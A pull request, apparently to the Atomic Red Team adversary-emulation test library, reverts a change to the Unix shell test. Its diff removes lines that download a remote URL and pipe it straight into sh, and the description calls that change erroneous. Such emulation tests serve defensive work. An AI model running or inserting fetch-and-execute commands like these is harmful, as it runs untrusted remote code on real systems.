### PR TITLE
revert changes kernel info

### DIFF
--- a/atomics/T1059.004/T1059.004.yaml
+++ b/atomics/T1059.004/T1059.004.yaml
@@ -323,11 +323,4 @@ atomic_tests:
     name: sh
     elevation_required: false
     command: |
-      cd /tmp
-      curl -s #{remote_url}
-      ls -la /tmp/art.txt
-      curl -s #{remote_url} |sh
-      ls -la /tmp/art.txt      
-    cleanup_command: |
-      rm /tmp/art.txt
       uname -srm


### PR DESCRIPTION
It looks like this change was made erroneously since these commits don't fit the description for the atomic and there is no remote_url defined for the test

![image](https://github.com/redcanaryco/atomic-red-team/assets/22311332/67047b86-43e4-4d00-b8f6-56ba8f17174c)
